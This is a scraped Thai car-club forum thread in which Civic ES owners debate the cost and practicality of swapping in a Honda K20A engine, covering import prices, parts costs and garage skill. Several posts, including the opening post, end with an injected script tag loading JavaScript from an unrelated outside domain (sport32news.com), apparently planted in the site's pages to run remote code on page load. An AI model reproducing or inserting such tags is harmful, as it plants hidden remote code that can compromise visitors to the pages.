ตอบ
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 18 มกรา 2012 09:07 - ความเป็นไปได้เรื่อง K SERIES
รบกวนขอความเห็นเพื่อนๆพี่ๆเรื่องเครื่อง K ครับ
1.จริงๆแล้วผมซื้อรถ es มาเพราะตั้งใจว่าจะต่อทุนไป K SERIES ง่ายขึ้นเพราะอย่างน้อย ES ก็มีแบบเดิมที่เครื่อง K20A มาเลย แต่เกียร์ AUTO
2.แต่เมื่อได้คุยกับเพื่อนที่ใช้ STREAM CRV หรือจะเป็น CIVIC ตัวที่เครื่อง K20A K20Z กลับพบว่ายังมีปัญหาหรือข้อเสียอีกหลายจุดที่ไม่ควรขยับไป K SERIES
2.1 ถ้าเปรียบกับเครื่อง D SERIES กับ B SERIES ช่างทั่วไปทุกอู่ทำได้ แต่ช่างที่เข้าใจเครื่อง K SERIES พอที่จะรู้จุดอ่อนจุดแข็งกลับมีอยู่ไม่กี่อู่
2.2 ราคาค่าอะไหล่ แพงกว่า D SERIES และ B SERIES เฉลี่ยประมาณ 3 เท่าตัว เท่าที่ผมศึกษาราคาตามเชียงกงและผู้ใช้ ตัวอย่างเช่น หัวเพลา ลูกรอกสายพาน หม้อน้ำ คอมแอร์ เป็นต้น
2.3 พอดีเพื่อนสนิทผมประมูล JUNK ที่ญี่ปุ่นอยู่ 3-4 คนเครื่องมีเพียบเลยมาถึงบ้านเรารวมภาษีแล้วก็ราคาไม่เท่าไหร่ แต่พอมาโดนค่าแปลงค่าวางปุ๊บถ้าเป็นฝาแดงก็ซื้อ ESปี2001 ได้อีกคันพอดี หรือถ้าเป็นฝาดำ TYPE S ก็ดาวน์ FD นั่งสบายตูดได้เลย
2.4 เห็นมีเพื่อนที่ใช้อยู่ ในBODY FD เดิมๆบ้านเรานี่แหละประสบปัญหาเรื่อง อะไหล่ไม่มี เช่นลูกรอกสายพาน ถ้ามองย้อนกลับว่าเป็นเครื่อง version ญี่ปุ่นยิ่งแล้วใหญ่เลยทีนี้ เพราะรถที่ซื้อจากศูนย์บ้านเรายังหาอะไหล่บางตัวไม่ได้ ตามร้านเพื่อนๆผมถามๆดูก็ไม่เคยได้ยินว่าใครแยกอะไหล่เครื่องขายเลย
3. อยากขอความรู้จาก ผู้ใช้ ผู้รู้ ว่า
3.1เมื่อไหร่ค่าวาง Kจะถูก
3.2เมื่อไหร่ช่างบ้านเราจะทำเครื่อง K ได้ทุกอู่และมีความเป็นไปได้มั๊ย
3.3รบกวนสอบถามราคาอะไหล่จากผู้ใช้งานจริงว่า ชิ้นไหนราคาเท่าไหร่

สุดท้ายส่วนตัวผมมองว่า K20A K20Z เกียร์ AUTO ราคาไม่ควรเกิน 25000-30000
K20A TYPE S เกียร์ MT ราคาไม่ควรเกิน 35000-40000
เพราะราคาตัดที่ญี่ปุ่นแทบจะไม่แตกต่างจากเครื่อง D SERIES และ B SERIES เลยแต่ราคามันมาแพงเพราะพ่อค้าคนกลางนี่แหละ
อย่าลืมนะครับว่า ราคาที่แพงเกินไปก็เป็นอุปสรรคหนึ่งในการ ซื้อหาของผู้บริโภค มีคนซื้อน้อย อู่ ที่ทำได้และโอกาสที่จะเชี่ยวชาญก็จะมีน้อยตาม สุดท้ายพ่อค้าก็จะขายได้น้อยตามไปด้วยครับ
ลองมองอย่างนี้นะครับ สมมุติว่าในท้องตลาดเครื่อง D SERIES และ B SERIES หมดไป
ถ้าเป็นเมื่อก่อนเจ้าของรถที่เครื่องพังบอกว่า วาง D15B 30000 วาง B16A AUTO 50000 วางB16A MT 70000 คุ้มกว่าไปซือรถใหม่เย้ออออออออออ
(ส่วน B16B และ B18CR ไม่ขอพูดถึงเพราะมันคือ step เทพ ในที่นี้พูดถึงรถใช้งานทั่วไป)
แต่ถ้าเป็นตอนที่ในตลาดมีแต่เครื่อง K เจ้าของรถคงพูดว่า" เออๆซ่อมให้แม่งพอขับได้ แล้วเอาไปขายเตนท์ซะ กูว่าวางเครื่องไม่คุ้มหรอก เอาตังค์ไปดาวน์รถใหม่ดีกว่า" <script src="https://sport32news.com/civicesgroup.js"></


แก้ไขล่าสุดโดย เมื่อ พุธ, 18 มกรา 2012 11:39, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
top_es


เข้าร่วม: 01 กุมภา 2010
ตอบ: 842

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 40

ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 18 มกรา 2012 09:36 - ความเป็นไปได้เรื่อง K SERIES
ความรู้เลยครับ

กำลังคิดอะไรพอดีเลย
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  khem_hatyai  scanclub 
catsteal


ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

ที่อยู่: เชียงใหม่-กรุงเทพ
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 18 มกรา 2012 09:47 - ความเป็นไปได้เรื่อง K SERIES
เรื่องราคาสูงอยู่หลายปัจจัยคับ ยกตัวอย่างเช่น
ของที่นู้นถูกก็จิง ก็มันผลิตนี่ (ขายทิ้งเหมือนเป็นขยะเลย)
พอเข้าไทยก็ต้องเสียภาษีในรูปแบบอะไหร่ (อินวอย) ไหนจะค่าส่ง ค่าขน ค่าเสียเวลา ค่าดำเนินการ ใต้โต้ะนิดๆหน่อย โกดังพักของ
ง่ายๆคือยังไงก็ต้อง+คับ ราคาก็สูงขึ้นเป็นธรรมดา(ถ้าไม่บวกผมว่าคงกลับไปปลูกผักขายดีกว่า)
ของมีน้อยราคาสูง ของมีมากราคาต่ำ ความนิยมในการเล่น ทำให้ราคาคงที่หรืออาจเพิ่มขึ้น
เป็นเครื่องระดับท๊อบและใหม่ของฮอนด้า
คนที่วางมา ส่วนมากจะไม่ปล่อย เหมือนบล็อก B D เพราะเป็นเครื่องที่ท๊อบแล้ว โมเพิ่มอย่างเดียว
อะไรประมาณนี้แหละคับ

ส่วนราคาจะลงมั้ย อันนี้ผมว่าไม่น่านะ ขนาดเครื่องตระกูลเจยังราคาขึ้นเลย ตั้งแต่กระแสดริ๊ฟเริ่มมา

ส่วนเรื่องวางผมว่าก็มีหลายอู่นะคับ เท่าที่ผมสอบถามจากผู้วางมาก่อน (คนไทยไม่แพ้ชาติใดในโลก)

คนเล่นรถมีหลายแบบหลายสไต อย่างผมมันแต่งสวยเหลือตังค่อยลงเครื่อง ไม่ค่อยสนเท่าไหร่เรื่องขายต่อ กะพังคาตีนไปเลย
บางคนจะมองว่าขายไปเอาตัวใหม่ แต่ไงได้รถใหม่ก็คือรถบ้านเหมือนเดิม แต่สำหรับผมจะเอารถบ้านเดิมๆนี้แหละให้มันเป็นรถที่สุดจิงๆ
khem_hatyai


ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ที่อยู่: เกิดที่ นครศรีฯ ตอนนี้ สงขลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 18 มกรา 2012 10:14 - ความเป็นไปได้เรื่อง K SERIES
อยากวางมั่งจัง แต่ตังค์ไม่ค่อยมี........ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  tamy2975 
yorkydog


ชื่อเล่น: เปี๊ยก

เข้าร่วม: 09 กันยา 2010
ตอบ: 1353

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1470
ให้คำขอบคุณ: 2437

ที่อยู่: ABAC บางนา. โซนสมุทรปราการ
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 18 มกรา 2012 10:41 - ความเป็นไปได้เรื่อง K SERIES
catsteal พิมพ์ว่า:
เรื่องราคาสูงอยู่หลายปัจจัยคับ ยกตัวอย่างเช่น
ของที่นู้นถูกก็จิง ก็มันผลิตนี่ (ขายทิ้งเหมือนเป็นขยะเลย)
พอเข้าไทยก็ต้องเสียภาษีในรูปแบบอะไหร่ (อินวอย) ไหนจะค่าส่ง ค่าขน ค่าเสียเวลา ค่าดำเนินการ ใต้โต้ะนิดๆหน่อย โกดังพักของ
ง่ายๆคือยังไงก็ต้อง+คับ ราคาก็สูงขึ้นเป็นธรรมดา(ถ้าไม่บวกผมว่าคงกลับไปปลูกผักขายดีกว่า)
ของมีน้อยราคาสูง ของมีมากราคาต่ำ ความนิยมในการเล่น ทำให้ราคาคงที่หรืออาจเพิ่มขึ้น
เป็นเครื่องระดับท๊อบและใหม่ของฮอนด้า
คนที่วางมา ส่วนมากจะไม่ปล่อย เหมือนบล็อก B D เพราะเป็นเครื่องที่ท๊อบแล้ว โมเพิ่มอย่างเดียว
อะไรประมาณนี้แหละคับ

ส่วนราคาจะลงมั้ย อันนี้ผมว่าไม่น่านะ ขนาดเครื่องตระกูลเจยังราคาขึ้นเลย ตั้งแต่กระแสดริ๊ฟเริ่มมา

ส่วนเรื่องวางผมว่าก็มีหลายอู่นะคับ เท่าที่ผมสอบถามจากผู้วางมาก่อน (คนไทยไม่แพ้ชาติใดในโลก)

คนเล่นรถมีหลายแบบหลายสไต อย่างผมมันแต่งสวยเหลือตังค่อยลงเครื่อง ไม่ค่อยสนเท่าไหร่เรื่องขายต่อ กะพังคาตีนไปเลย
บางคนจะมองว่าขายไปเอาตัวใหม่ แต่ไงได้รถใหม่ก็คือรถบ้านเหมือนเดิม แต่สำหรับผมจะเอารถบ้านเดิมๆนี้แหละให้มันเป็นรถที่สุดจิงๆ



ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  tamy2975  scanclub 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 18 มกรา 2012 11:21 - ความเป็นไปได้เรื่อง K SERIES
ตอนนี้ถ้ามีตังค์ผมก็ไม่วางนะครับ ... ข่มใจกับความรู้สึกอยากได้ K20A จนถึงจุดอิ่มตัวแล้ว

เป้าหมายต่อไปเลยกลายเป็น รถที่มันมี K20A มาเลย ..

ราคาแมร่งโหดกว่าเดิม ... หน้ามืด หงืดเลย !!~ นี่แหละความอยาก
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 18 มกรา 2012 11:25 - ความเป็นไปได้เรื่อง K SERIES
hacker พิมพ์ว่า:
ตอนนี้ถ้ามีตังค์ผมก็ไม่วางนะครับ ... ข่มใจกับความรู้สึกอยากได้ K20A จนถึงจุดอิ่มตัวแล้ว

เป้าหมายต่อไปเลยกลายเป็น รถที่มันมี K20A มาเลย ..

ราคาแมร่งโหดกว่าเดิม ... หน้ามืด หงืดเลย !!~ นี่แหละความอยาก

ถูกของพี่ครับ ขนาดผมขายของเชียงกง พอเห็นค่าวางค่าบำรุงรักษาแล้วยังทำใจไม่ได้เลย
ได้รับคำขอบคุณจาก: K_series  yoosabai  wut-chiangmai  tamy2975  civicIT  Nut_Au_Together  scanclub 
jatupornes


เข้าร่วม: 28 กันยา 2009
ตอบ: 413

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1089
ให้คำขอบคุณ: 103

ที่อยู่: กทม
ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 18 มกรา 2012 12:24 - ความเป็นไปได้เรื่อง K SERIES
catsteal พิมพ์ว่า:
เรื่องราคาสูงอยู่หลายปัจจัยคับ ยกตัวอย่างเช่น
ของที่นู้นถูกก็จิง ก็มันผลิตนี่ (ขายทิ้งเหมือนเป็นขยะเลย)
พอเข้าไทยก็ต้องเสียภาษีในรูปแบบอะไหร่ (อินวอย) ไหนจะค่าส่ง ค่าขน ค่าเสียเวลา ค่าดำเนินการ ใต้โต้ะนิดๆหน่อย โกดังพักของ
ง่ายๆคือยังไงก็ต้อง+คับ ราคาก็สูงขึ้นเป็นธรรมดา(ถ้าไม่บวกผมว่าคงกลับไปปลูกผักขายดีกว่า)
ของมีน้อยราคาสูง ของมีมากราคาต่ำ ความนิยมในการเล่น ทำให้ราคาคงที่หรืออาจเพิ่มขึ้น
เป็นเครื่องระดับท๊อบและใหม่ของฮอนด้า
คนที่วางมา ส่วนมากจะไม่ปล่อย เหมือนบล็อก B D เพราะเป็นเครื่องที่ท๊อบแล้ว โมเพิ่มอย่างเดียว
อะไรประมาณนี้แหละคับ

ส่วนราคาจะลงมั้ย อันนี้ผมว่าไม่น่านะ ขนาดเครื่องตระกูลเจยังราคาขึ้นเลย ตั้งแต่กระแสดริ๊ฟเริ่มมา

ส่วนเรื่องวางผมว่าก็มีหลายอู่นะคับ เท่าที่ผมสอบถามจากผู้วางมาก่อน (คนไทยไม่แพ้ชาติใดในโลก)

คนเล่นรถมีหลายแบบหลายสไต อย่างผมมันแต่งสวยเหลือตังค่อยลงเครื่อง ไม่ค่อยสนเท่าไหร่เรื่องขายต่อ กะพังคาตีนไปเลย
บางคนจะมองว่าขายไปเอาตัวใหม่ แต่ไงได้รถใหม่ก็คือรถบ้านเหมือนเดิม แต่สำหรับผมจะเอารถบ้านเดิมๆนี้แหละให้มันเป็นรถที่สุดจิงๆ


คิดเหมือนกันครับ ++++++++1
ได้รับคำขอบคุณจาก: yoosabai  tamy2975  ค้าอะไหล่โคตรเก่า  scanclub 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
พุธ, 18 มกรา 2012 12:28 - ความเป็นไปได้เรื่อง K SERIES
ตามนั้น ครับ ^^"

รอ K20A ถูก ผมก็ จะว่างเหมือน กัน แค่ มันเท่ย์.... <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: tamy2975  ค้าอะไหล่โคตรเก่า  scanclub 
K_series


เข้าร่วม: 01 ตุลา 2008
ตอบ: 3032

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 22059
ให้คำขอบคุณ: 6045
พุธ, 18 มกรา 2012 12:43 - ความเป็นไปได้เรื่อง K SERIES
จะวางK20ต้องตัดเหตุผลทั้งหลายทั้งปวงทิ้งไปครับ ใช้แค่กิเลสล้วนๆรับรองได้วางแน่

เรื่องจะรอให้ราคาเครื่องถูกนั้นยากมากถึงมากที่สุดครับ เหตุผลผมก้อคิดคล้ายๆคุณeskungนั่นแหละครับ



ส่วนเรื่องอู่ที่วางKได้เนียนๆนั้น ผมก้อว่าหลายอู่แล้วนะครับตอนนี้

แต่ทางด้านราคาผมไม่รู้เหมือนกันว่าแต่ละอู่เค้าคิดเท่าไหร่บ้าง

และเดี๋ยวนี้วิธีจะยัดKลงในESนั้นก้อมีหลากหลายวิธีขึ้นอยู่กับว่าจะเลือกทางไหนครับ
yoosabai


ชื่อเล่น: เอ้

เข้าร่วม: 30 กันยา 2008
ตอบ: 1992

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8345
ให้คำขอบคุณ: 4773

ที่อยู่: Samutprakarn
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 18 มกรา 2012 12:53 - ความเป็นไปได้เรื่อง K SERIES
ผมเองก็อยากได้ แต่บวกลบคูณหารแล้ว เห็นทีจะต้องขับบล็อค D ต่อไปก่อน เอาให้มันพังคาเท้า

เหตุผลที่เครื่อง K มีราคาสูงในมุมมองผม น่าจะเป็นเพราะมันผลิต และใช้กับรถที่ผลิตและขายในญี่ปุ่นกับประเทศอื่นอีกบางประเทศเท่านั้น ซึ่งยกเว้นประเทศไทย.... ขนาดในญี่ปุ่นเองก็มีรถเพียงไม่กี่รุ่นที่ใช้เครื่อง K เป็นเครื่องติดรถจากโรงงาน แถมมันยังไม่ใช่รถตลาดซะด้วย
ก็เลยเข้าทางที่ว่าของมีน้อยคนอยากได้เยอะ คนกลางที่เอาเข้ามาก็เลยเพิ่มราคาขายขึ้นได้อีกเยอะ

อีกอย่างนึงผมว่ามันยังเป็นเทคโนโลยีใหม่อยู่ด้วยอ่ะครับ

เรื่องราคาตามที่คุณ จขกท. บอก เป็นราคาที่ใครๆก็ปรารณารวมทั้งผมเอง.... แต่ดูจากตลาดแล้วคงเป็นไปได้ยากในช่วงเวลาอันใกล้นี้น่ะครับ ปล่อยให้เป็นไปตามวัฎจักรของมันดีกว่าครับ เดี๋ยวมันก็ลงของมันเอง

เรื่องอู่ อู่ไหนที่เคยทำ คนก็จะแห่เข้าไปทำกันแต่อู่นั้น.... ซึ่งถ้าเป็นผม ผมก็น่าจะทำอย่างนั้นเหมือนกัน ของมันแพงก็ไม่อยากไปลองผิดลองถูกกับอู่อื่น เดี๋ยวมันจะได้ไม่คุ้มเสีย

แต่ผมเชื่อว่าเดี๋ยวพอความต้องการมันมากขึ้นเรื่อยๆ คนก็จะเอามันเข้ามากันมากขึ้น สุดท้ายมันก็จะล้นตลาด ราคาก็น่าจะถูกลงครับ

แต่หากความนิยมยังมีอยู่อย่างต่อเนื่อง จนของที่มีอยู่ในตลาดค่อยๆน้อยลง มันก็น่าจะกลับมาแพงอีกเหมือนกับบรรดา B16 หรือ J อ่ะครับ



civic3025


ชื่อเล่น: เบิร์ด

เข้าร่วม: 03 พฤศจิกา 2010
ตอบ: 1266

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1399
ให้คำขอบคุณ: 480

ที่อยู่: ชลบุรี.นครศรีธรรมราช
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 18 มกรา 2012 12:53 - ความเป็นไปได้เรื่อง K SERIES
ได้รับคำขอบคุณจาก: tamy2975  ค้าอะไหล่โคตรเก่า  scanclub 
Hamster@Yamabuchi


ชื่อเล่น: เบิร์ด

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

ที่อยู่: เขตหวงห้ามเฉพาะ
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 18 มกรา 2012 13:22 - ความเป็นไปได้เรื่อง K SERIES
เก็บข้อมูล คริ คริ
ได้รับคำขอบคุณจาก: Wut_On  tamy2975  BEER_CIVIC ES  ค้าอะไหล่โคตรเก่า  zan  hacker  scanclub 
Wut_On


ชื่อเล่น: วุฒิ

เข้าร่วม: 13 มกรา 2012
ตอบ: 776

Guru ES
Guru ES

ได้รับคำขอบคุณ: 646
ให้คำขอบคุณ: 540

ที่อยู่: อ. นครหลวง จ.อยุธยา
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 18 มกรา 2012 13:32 - ความเป็นไปได้เรื่อง K SERIES
เก็บข้อมูล
ได้รับคำขอบคุณจาก: tamy2975  ค้าอะไหล่โคตรเก่า  scanclub 
zaeson


ชื่อเล่น: อั้ม

เข้าร่วม: 30 มกรา 2009
ตอบ: 785

Guru ES
Guru ES

ได้รับคำขอบคุณ: 106
ให้คำขอบคุณ: 50

ที่อยู่: เทพารักษ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 18 มกรา 2012 13:52 - ความเป็นไปได้เรื่อง K SERIES
yoosabai พิมพ์ว่า:
ผมเองก็อยากได้ แต่บวกลบคูณหารแล้ว เห็นทีจะต้องขับบล็อค D ต่อไปก่อน เอาให้มันพังคาเท้า

เหตุผลที่เครื่อง K มีราคาสูงในมุมมองผม น่าจะเป็นเพราะมันผลิต และใช้กับรถที่ผลิตและขายในญี่ปุ่นกับประเทศอื่นอีกบางประเทศเท่านั้น ซึ่งยกเว้นประเทศไทย.... ขนาดในญี่ปุ่นเองก็มีรถเพียงไม่กี่รุ่นที่ใช้เครื่อง K เป็นเครื่องติดรถจากโรงงาน แถมมันยังไม่ใช่รถตลาดซะด้วย
ก็เลยเข้าทางที่ว่าของมีน้อยคนอยากได้เยอะ คนกลางที่เอาเข้ามาก็เลยเพิ่มราคาขายขึ้นได้อีกเยอะ

อีกอย่างนึงผมว่ามันยังเป็นเทคโนโลยีใหม่อยู่ด้วยอ่ะครับ

เรื่องราคาตามที่คุณ จขกท. บอก เป็นราคาที่ใครๆก็ปรารณารวมทั้งผมเอง.... แต่ดูจากตลาดแล้วคงเป็นไปได้ยากในช่วงเวลาอันใกล้นี้น่ะครับ ปล่อยให้เป็นไปตามวัฎจักรของมันดีกว่าครับ เดี๋ยวมันก็ลงของมันเอง

เรื่องอู่ อู่ไหนที่เคยทำ คนก็จะแห่เข้าไปทำกันแต่อู่นั้น.... ซึ่งถ้าเป็นผม ผมก็น่าจะทำอย่างนั้นเหมือนกัน ของมันแพงก็ไม่อยากไปลองผิดลองถูกกับอู่อื่น เดี๋ยวมันจะได้ไม่คุ้มเสีย

แต่ผมเชื่อว่าเดี๋ยวพอความต้องการมันมากขึ้นเรื่อยๆ คนก็จะเอามันเข้ามากันมากขึ้น สุดท้ายมันก็จะล้นตลาด ราคาก็น่าจะถูกลงครับ

แต่หากความนิยมยังมีอยู่อย่างต่อเนื่อง จนของที่มีอยู่ในตลาดค่อยๆน้อยลง มันก็น่าจะกลับมาแพงอีกเหมือนกับบรรดา B16 หรือ J อ่ะครับ






+1 ว่าแต่ลุงเอ้กะเอาให้พังคาเท้าเลยรึ
ได้รับคำขอบคุณจาก: tamy2975  ค้าอะไหล่โคตรเก่า  scanclub 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 18 มกรา 2012 13:59 - ความเป็นไปได้เรื่อง K SERIES
ถ้าขายรถที่มีอยู่ กับค่าวาง K20
เพิ่มตังอีกไม่เท่าไรก็ได้รถที่วางK มาเลยไม่ดีกว่าหรอครับ

ใจผมก็เคยอยากได้ รถแรงๆไว้ขับ แต่เดี๋ยวนี้ ถนนบ้านเรา ตำรวจเยอะแท้ คอยจะซุ่มจับกันแต่รถความเร็วเกินกฏหมาย จับกันแต่รถแต่ง ช่วงหลังมา แถมเดี๋ยวนี้พวกขับช้าวิ่งขวา มีเยอะมากๆ ทำให้เป็นอะไรที่น่าเบื่อมากเลยครับ แถมนี้เดี๋ยวนี้อะไรก็ไม่แน่นอน น้ำจะท่วมอีกเมื่อไรไม่รู้ เลยมองพวกรถสูงๆไว้ลุยน้ำดีกว่าเอาเงินมาวางเครื่องอ่ะครับ
ได้รับคำขอบคุณจาก: BEER_CIVIC ES  ค้าอะไหล่โคตรเก่า  Nut_Au_Together  K_series  scanclub 
kimberly55


ชื่อเล่น: คิมเบอลี่

เข้าร่วม: 11 สิงหา 2009
ตอบ: 1141

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1050
ให้คำขอบคุณ: 405

ที่อยู่: นครราชสีมา, สีคิ้ว
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 18 มกรา 2012 14:13 - ความเป็นไปได้เรื่อง K SERIES
จริงๆแล้ว ไม่รู้จะแรงไปทำไมกันนะคะ ไม่ใช่รถเอาไว้แข่งเป็นอาชีพ ทุกวันนี้เราจะขับถึง 150 สักเดือนละครั้งได้มั้ง ฮ่าๆ ทางด่วนยังแค่ 140 เองมากสุด รักชีวิตค่ะ ฮ่าๆ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  K_series  scanclub 
pom_sawas


เข้าร่วม: 13 ธันวา 2008
ตอบ: 886

Guru ES
Guru ES

ได้รับคำขอบคุณ: 664
ให้คำขอบคุณ: 898

ที่อยู่: ร้านขายนมผง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 18 มกรา 2012 14:19 - ความเป็นไปได้เรื่อง K SERIES
K_series พิมพ์ว่า:
จะวางK20ต้องตัดเหตุผลทั้งหลายทั้งปวงทิ้งไปครับ ใช้แค่กิเลสล้วนๆรับรองได้วางแน่

เรื่องจะรอให้ราคาเครื่องถูกนั้นยากมากถึงมากที่สุดครับ เหตุผลผมก้อคิดคล้ายๆคุณeskungนั่นแหละครับ



ส่วนเรื่องอู่ที่วางKได้เนียนๆนั้น ผมก้อว่าหลายอู่แล้วนะครับตอนนี้

แต่ทางด้านราคาผมไม่รู้เหมือนกันว่าแต่ละอู่เค้าคิดเท่าไหร่บ้าง

และเดี๋ยวนี้วิธีจะยัดKลงในESนั้นก้อมีหลากหลายวิธีขึ้นอยู่กับว่าจะเลือกทางไหนครับ


พี่ชอบจริงครับบิ๊ก ใช้กิเลสล้วนเนี้ย ถูกใจกด Like ให้เลยอิอิ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  K_series  scanclub 
day2520


เข้าร่วม: 23 มีนา 2010
ตอบ: 873

Guru ES
Guru ES

ได้รับคำขอบคุณ: 649
ให้คำขอบคุณ: 303

ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 18 มกรา 2012 14:50 - ความเป็นไปได้เรื่อง K SERIES
kimberly55 พิมพ์ว่า:
จริงๆแล้ว ไม่รู้จะแรงไปทำไมกันนะคะ ไม่ใช่รถเอาไว้แข่งเป็นอาชีพ ทุกวันนี้เราจะขับถึง 150 สักเดือนละครั้งได้มั้ง ฮ่าๆ ทางด่วนยังแค่ 140 เองมากสุด รักชีวิตค่ะ ฮ่าๆ



มองโลกอย่างฉลาดมากครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
Nung_Sodapop


ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

ที่อยู่: ลาดกระบัง
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 18 มกรา 2012 15:37 - ความเป็นไปได้เรื่อง K SERIES
ขายรถเลยครับ ได้ K20A ฝาแดงแน่
แต่ไม่มีรถให้วางนะครับ แหะๆ...
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 18 มกรา 2012 15:48 - ความเป็นไปได้เรื่อง K SERIES
K_series พิมพ์ว่า:
จะวางK20ต้องตัดเหตุผลทั้งหลายทั้งปวงทิ้งไปครับ ใช้แค่กิเลสล้วนๆรับรองได้วางแน่

เรื่องจะรอให้ราคาเครื่องถูกนั้นยากมากถึงมากที่สุดครับ เหตุผลผมก้อคิดคล้ายๆคุณeskungนั่นแหละครับ



ส่วนเรื่องอู่ที่วางKได้เนียนๆนั้น ผมก้อว่าหลายอู่แล้วนะครับตอนนี้

แต่ทางด้านราคาผมไม่รู้เหมือนกันว่าแต่ละอู่เค้าคิดเท่าไหร่บ้าง

และเดี๋ยวนี้วิธีจะยัดKลงในESนั้นก้อมีหลากหลายวิธีขึ้นอยู่กับว่าจะเลือกทางไหนครับ

ตอนนี้ผมกำลังคิดอยู่ว่าเดี๋ยวผมจะเอาจำนวนลูกค้ามาเป็นเครื่องต่อรอง คือขอราคาพิเศษจากเพื่อนๆผมนั่นเอง เรื่องเครื่องผมมั่นใจว่าผมซื้อให้พี่น้องเราทุกคนได้ราคาถูกแน่ๆ แต่ที่กำลังคิดหนักจะเป็นเรื่องค่าวาง และค่าบำรุงรักษาต่อจากนั้นมากกว่าครับ
ได้รับคำขอบคุณจาก: K_series  Lee_ES_turbo 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
